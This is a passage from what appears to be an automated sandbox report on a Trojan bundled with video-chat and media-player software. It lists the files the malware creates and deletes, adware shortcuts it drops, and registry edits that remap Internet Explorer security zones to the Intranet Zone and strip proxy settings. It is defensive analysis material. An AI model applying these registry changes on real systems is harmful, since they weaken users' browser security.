%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (2067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (2199 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (2332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RAV_DL (0 bytes)
%Program Files%\Rising\RAV (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (0 bytes)
%Program Files%\Rising (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\irg[1].ashx (0 bytes)
%Program Files%\RsTest.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\ErrorNet[1].htm (0 bytes)
The process 9158.exe:3012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The process xianfengupdate.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\网址导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2058 bytes)
%Program Files%\tools\tools.exe (2532 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快捷导航\打折网购.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (8089 bytes)
%Documents and Settings%\%current user%\Favorites\全国最给力充值店-淘宝网.url (46 bytes)
%Documents and Settings%\All Users\Desktop\网址导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll (544 bytes)
%Documents and Settings%\%current user%\Favorites\Links\全国最给力充值店-淘宝网.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\打折网购.lnk (1 bytes)
%Documents and Settings%\All Users\Desktop\打折网购.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3165 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快捷导航\网址导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (823 bytes)
%Documents and Settings%\%current user%\Desktop\Intrenet. Expleror.lnk (805 bytes)
The Trojan deletes the following file(s):
%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (0 bytes)
The process %original file name%.exe:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\xfplay\tools.exe (1530 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Program Files%\xfplay\bdupdate.exe (103612 bytes)
%Program Files%\xfplay\xianfengkunbang.exe (26550 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2566 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Program Files%\xfplay\xianfeng.exe (197071 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3345 bytes)
%Program Files%\xfplay\xianfengupdate.exe (16294 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (0 bytes)
%Program Files%\xfplay\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
Registry activity
The process 9158chat2_ktv088_63.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"
[HKLM\SOFTWARE\9158web]
"StartTime" = "11070701"
[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\9158Service]
"LastPlat" = "51"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"DisplayVersion" = "6.940"
"DisplayName" = "9158多人视频"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158多人视频"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F B0 73 C9 4C FA 32 79 A2 41 44 B1 71 CD D1 E0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "天格科技（杭州）有限公司"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"URLInfoAbout" = "http://www.9158.com/"
The process sr.exe:244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA EA 78 7D 63 CE F0 13 1F C2 0F EA A3 C0 FB 44"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 9158IE.exe:3116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E B7 9E F5 94 82 B8 48 BB 6E 0E 52 D8 BA F0 0C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
